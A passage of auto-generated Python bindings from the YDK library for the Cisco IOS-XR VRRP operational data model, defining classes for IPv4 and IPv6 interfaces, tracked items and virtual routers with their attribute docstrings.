('old_state', (YLeaf(YType.enumeration, 'old-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBagProtocolState', '')])),
('new_state', (YLeaf(YType.enumeration, 'new-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBagProtocolState', '')])),
('reason', (YLeaf(YType.enumeration, 'reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpStateChangeReason', '')])),
])
self.old_state = None
self.new_state = None
self.reason = None
self.time = Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory.Time()
self.time.parent = self
self._children_name_map["time"] = "time"
self._segment_path = lambda: "state-change-history"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory, ['old_state', 'new_state', 'reason'], name, value)
class Time(_Entity_):
"""
Time of state change
.. attribute:: seconds
Seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: nanoseconds
Nanoseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: nanosecond
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory.Time, self).__init__()
self.yang_name = "time"
self.yang_parent_name = "state-change-history"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('seconds', (YLeaf(YType.uint32, 'seconds'), ['int'])),
('nanoseconds', (YLeaf(YType.uint32, 'nanoseconds'), ['int'])),
])
self.seconds = None
self.nanoseconds = None
self._segment_path = lambda: "time"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory.Time, ['seconds', 'nanoseconds'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory.Time']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters.VirtualRouter']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters']['meta_info']
class Interfaces(_Entity_):
"""
The VRRP interface table
.. attribute:: interface
A VRRP interface entry
**type**\: list of :py:class:`Interface <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.Interfaces.Interface>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.Interfaces, self).__init__()
self.yang_name = "interfaces"
self.yang_parent_name = "ipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface", ("interface", Vrrp.Ipv6.Interfaces.Interface))])
self._leafs = OrderedDict()
self.interface = YList(self)
self._segment_path = lambda: "interfaces"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv6/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.Interfaces, [], name, value)
class Interface(_Entity_):
"""
A VRRP interface entry
.. attribute:: interface_name (key)
The name of the interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: interface
IM Interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: invalid_checksum_count
Invalid checksum
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_version_count
Unknown/unsupported version
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_vrid_count
Invalid vrID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_packet_length_count
Bad packet lengths
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.Interfaces.Interface, self).__init__()
self.yang_name = "interface"
self.yang_parent_name = "interfaces"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['interface_name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('invalid_checksum_count', (YLeaf(YType.uint32, 'invalid-checksum-count'), ['int'])),
('invalid_version_count', (YLeaf(YType.uint32, 'invalid-version-count'), ['int'])),
('invalid_vrid_count', (YLeaf(YType.uint32, 'invalid-vrid-count'), ['int'])),
('invalid_packet_length_count', (YLeaf(YType.uint32, 'invalid-packet-length-count'), ['int'])),
])
self.interface_name = None
self.interface = None
self.invalid_checksum_count = None
self.invalid_version_count = None
self.invalid_vrid_count = None
self.invalid_packet_length_count = None
self._segment_path = lambda: "interface" + "[interface-name='" + str(self.interface_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv6/interfaces/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.Interfaces.Interface, ['interface_name', 'interface', 'invalid_checksum_count', 'invalid_version_count', 'invalid_vrid_count', 'invalid_packet_length_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.Interfaces.Interface']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.Interfaces']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6']['meta_info']
class Ipv4(_Entity_):
"""
IPv4 VRRP configuration
.. attribute:: interfaces
The VRRP interface table
**type**\: :py:class:`Interfaces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.Interfaces>`
**config**\: False
.. attribute:: track_items
The VRRP tracked item table
**type**\: :py:class:`TrackItems <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.TrackItems>`
**config**\: False
.. attribute:: virtual_routers
The VRRP virtual router table
**type**\: :py:class:`VirtualRouters <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4, self).__init__()
self.yang_name = "ipv4"
self.yang_parent_name = "vrrp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interfaces", ("interfaces", Vrrp.Ipv4.Interfaces)), ("track-items", ("track_items", Vrrp.Ipv4.TrackItems)), ("virtual-routers", ("virtual_routers", Vrrp.Ipv4.VirtualRouters))])
self._leafs = OrderedDict()
self.interfaces = Vrrp.Ipv4.Interfaces()
self.interfaces.parent = self
self._children_name_map["interfaces"] = "interfaces"
self.track_items = Vrrp.Ipv4.TrackItems()
self.track_items.parent = self
self._children_name_map["track_items"] = "track-items"
self.virtual_routers = Vrrp.Ipv4.VirtualRouters()
self.virtual_routers.parent = self
self._children_name_map["virtual_routers"] = "virtual-routers"
self._segment_path = lambda: "ipv4"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4, [], name, value)
class Interfaces(_Entity_):
"""
The VRRP interface table
.. attribute:: interface
A VRRP interface entry
**type**\: list of :py:class:`Interface <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.Interfaces.Interface>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.Interfaces, self).__init__()
self.yang_name = "interfaces"
self.yang_parent_name = "ipv4"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface", ("interface", Vrrp.Ipv4.Interfaces.Interface))])
self._leafs = OrderedDict()
self.interface = YList(self)
self._segment_path = lambda: "interfaces"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv4/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.Interfaces, [], name, value)
class Interface(_Entity_):
"""
A VRRP interface entry
.. attribute:: interface_name (key)
The name of the interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: interface
IM Interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: invalid_checksum_count
Invalid checksum
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_version_count
Unknown/unsupported version
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_vrid_count
Invalid vrID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_packet_length_count
Bad packet lengths
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.Interfaces.Interface, self).__init__()
self.yang_name = "interface"
self.yang_parent_name = "interfaces"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['interface_name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('invalid_checksum_count', (YLeaf(YType.uint32, 'invalid-checksum-count'), ['int'])),
('invalid_version_count', (YLeaf(YType.uint32, 'invalid-version-count'), ['int'])),
('invalid_vrid_count', (YLeaf(YType.uint32, 'invalid-vrid-count'), ['int'])),
('invalid_packet_length_count', (YLeaf(YType.uint32, 'invalid-packet-length-count'), ['int'])),
])
self.interface_name = None
self.interface = None
self.invalid_checksum_count = None
self.invalid_version_count = None
self.invalid_vrid_count = None
self.invalid_packet_length_count = None
self._segment_path = lambda: "interface" + "[interface-name='" + str(self.interface_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv4/interfaces/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.Interfaces.Interface, ['interface_name', 'interface', 'invalid_checksum_count', 'invalid_version_count', 'invalid_vrid_count', 'invalid_packet_length_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.Interfaces.Interface']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.Interfaces']['meta_info']
class TrackItems(_Entity_):
"""
The VRRP tracked item table
.. attribute:: track_item
A configured VRRP IP address entry
**type**\: list of :py:class:`TrackItem <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.TrackItems.TrackItem>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.TrackItems, self).__init__()
self.yang_name = "track-items"
self.yang_parent_name = "ipv4"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-item", ("track_item", Vrrp.Ipv4.TrackItems.TrackItem))])
self._leafs = OrderedDict()
self.track_item = YList(self)
self._segment_path = lambda: "track-items"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv4/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.TrackItems, [], name, value)
class TrackItem(_Entity_):
"""
A configured VRRP IP address entry
.. attribute:: interface_name (key)
The interface name to track
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: virtual_router_id (key)
The VRRP virtual router id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interface_name (key)
The name of the tracked interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: interface
IM Interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: virtual_router_id_xr
Virtual Router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_item_type
Type of tracked item
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: tracked_item_index
Tracked item index
**type**\: str
**length:** 0..32
**config**\: False
.. attribute:: state
State of the tracked item
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: priority
Priority weight of item
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.TrackItems.TrackItem, self).__init__()
self.yang_name = "track-item"
self.yang_parent_name = "track-items"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['interface_name','virtual_router_id','tracked_interface_name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('virtual_router_id', (YLeaf(YType.uint32, 'virtual-router-id'), ['int'])),
('tracked_interface_name', (YLeaf(YType.str, 'tracked-interface-name'), ['str'])),
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('virtual_router_id_xr', (YLeaf(YType.uint32, 'virtual-router-id-xr'), ['int'])),
('tracked_item_type', (YLeaf(YType.uint16, 'tracked-item-type'), ['int'])),
('tracked_item_index', (YLeaf(YType.str, 'tracked-item-index'), ['str'])),
('state', (YLeaf(YType.uint8, 'state'), ['int'])),
('priority', (YLeaf(YType.uint8, 'priority'), ['int'])),
])
self.interface_name = None
self.virtual_router_id = None
self.tracked_interface_name = None
self.interface = None
self.virtual_router_id_xr = None
self.tracked_item_type = None
self.tracked_item_index = None
self.state = None
self.priority = None
self._segment_path = lambda: "track-item" + "[interface-name='" + str(self.interface_name) + "']" + "[virtual-router-id='" + str(self.virtual_router_id) + "']" + "[tracked-interface-name='" + str(self.tracked_interface_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv4/track-items/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.TrackItems.TrackItem, ['interface_name', 'virtual_router_id', 'tracked_interface_name', 'interface', 'virtual_router_id_xr', 'tracked_item_type', 'tracked_item_index', 'state', 'priority'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.TrackItems.TrackItem']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.TrackItems']['meta_info']
class VirtualRouters(_Entity_):
"""
The VRRP virtual router table
.. attribute:: virtual_router
A VRRP virtual router
**type**\: list of :py:class:`VirtualRouter <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters.VirtualRouter>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters, self).__init__()
self.yang_name = "virtual-routers"
self.yang_parent_name = "ipv4"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("virtual-router", ("virtual_router", Vrrp.Ipv4.VirtualRouters.VirtualRouter))])
self._leafs = OrderedDict()
self.virtual_router = YList(self)
self._segment_path = lambda: "virtual-routers"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv4/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters, [], name, value)
class VirtualRouter(_Entity_):
"""
A VRRP virtual router
.. attribute:: interface_name (key)
The name of the interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: virtual_router_id (key)
The VRRP virtual router id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: resign_sent_time
Time last resign was sent
**type**\: :py:class:`ResignSentTime <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignSentTime>`
**config**\: False
.. attribute:: resign_received_time
Time last resign was received
**type**\: :py:class:`ResignReceivedTime <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignReceivedTime>`
**config**\: False
.. attribute:: interface_name_xr
IM Interface Name
**type**\: str
**length:** 0..64
**config**\: False
.. attribute:: virtual_router_id_xr
Virtual Router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: version
VRRP Protocol Version
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: address_family
Address family
**type**\: :py:class:`VrrpBAf <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBAf>`
**config**\: False
.. attribute:: session_name
Session Name
**type**\: str
**length:** 0..16
**config**\: False
.. attribute:: slaves
Number of slaves following state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: is_slave
Group is a slave group
**type**\: bool
**config**\: False
.. attribute:: followed_session_name
Followed Session Name
**type**\: str
**length:** 0..16
**config**\: False
.. attribute:: secondary_address_count
Configured VRRP secondary address count
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: operational_address_count
Operational VRRP address count
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: primary_virtual_ip
Configured IPv4 Primary address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: configured_down_address_count
Configured but Down VRRP address count
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: virtual_linklocal_ipv6_address
Virtual linklocal IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: primary_state
State of primary IP address
**type**\: :py:class:`VrrpVipState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpVipState>`
**config**\: False
.. attribute:: master_ip_address
Master router real IP address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: master_ipv6_address
Master router real IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: master_priority
Master router priority
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: vrrp_state
VRRP state
**type**\: :py:class:`VrrpBagProtocolState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBagProtocolState>`
**config**\: False
.. attribute:: authentication_type
Authentication type
**type**\: :py:class:`VrrpProtAuth <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpProtAuth>`
**config**\: False
.. attribute:: authentication_string
Authentication data
**type**\: str
**config**\: False
.. attribute:: configured_advertize_time
Configured advertize time
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: oper_advertize_time
Operational advertize time
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: min_delay_time
Minimum delay time in msecs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: millisecond
.. attribute:: reload_delay_time
Reload delay time in msecs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: millisecond
.. attribute:: delay_timer_flag
Delay timer running flag
**type**\: bool
**config**\: False
.. attribute:: delay_timer_secs
Delay timer running time secs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: delay_timer_msecs
Delay timer running time msecs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: millisecond
.. attribute:: authentication_flag
Text authentication configured flag
**type**\: bool
**config**\: False
.. attribute:: force_timer_flag
Configured timers forced flag
**type**\: bool
**config**\: False
.. attribute:: preempt_flag
Preempt configured flag
**type**\: bool
**config**\: False
.. attribute:: ip_address_owner_flag
IP address owner flag
**type**\: bool
**config**\: False
.. attribute:: is_accept_mode
Is accept mode
**type**\: bool
**config**\: False
.. attribute:: preempt_delay_time
Preempt delay time
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: configured_priority
Configured priority
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: operational_priority
Operational priority
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: priority_decrement
Priority decrement
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interface_count
Number of items tracked
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interface_up_count
Number of tracked items up
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_item_count
Number of tracked items
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_item_up_count
Number of tracked items in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: time_in_current_state
Time in current state secs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: state_change_count
Number of state changes
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: time_vrouter_up
Time vrouter is up in centiseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: centisecond
.. attribute:: master_count
No. of times become Master
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: adverts_received_count
No. of advertisements received
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: advert_interval_error_count
Advertise interval errors
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: adverts_sent_count
No. of advertisements sent
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: authentication_fail_count
Authentication failures
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ttl_error_count
TTL errors
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: priority_zero_received_count
No. priority 0 received
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: priority_zero_sent_count
No. priority 0 sent
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_packet_count
Invalid packets received
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: address_list_error_count
Address list errors
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_auth_type_count
Invalid authentication type
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: auth_type_mismatch_count
Authentication type mismatches
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_length_errors_count
Packet length errors
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: time_stats_discontinuity
Time since a statistics discontinuity in ticks (10ns units)
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_session_state
BFD session state
**type**\: :py:class:`VrrpBfdSessionState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBfdSessionState>`
**config**\: False
.. attribute:: bfd_interval
BFD packet send interval
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_multiplier
BFD multiplier
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_cfg_remote_ip
BFD configured remote IP
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: bfd_configured_remote_ipv6_address
BFD configured remote IPv6
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: state_from_checkpoint
Whether state recovered from checkpoint
**type**\: bool
**config**\: False
.. attribute:: interface_ipv4_address
The Interface Primary IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: interface_ipv6_address
The Interface linklocal IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: virtual_mac_address
Virtual mac address
**type**\: str
**pattern:** [0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2}){5}
**config**\: False
.. attribute:: virtual_mac_address_state
Virtual mac address state
**type**\: :py:class:`VrrpVmacState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpVmacState>`
**config**\: False
.. attribute:: operational_address
Operational IPv4 VRRP addresses
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv4_configured_down_address
IPv4 Configured but Down VRRP addresses
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_operational_address
IPv6 Operational VRRP addresses
**type**\: list of :py:class:`Ipv6OperationalAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6OperationalAddress>`
**config**\: False
.. attribute:: ipv6_configured_down_address
IPv6 Configured but Down VRRP addresses
**type**\: list of :py:class:`Ipv6ConfiguredDownAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress>`
**config**\: False
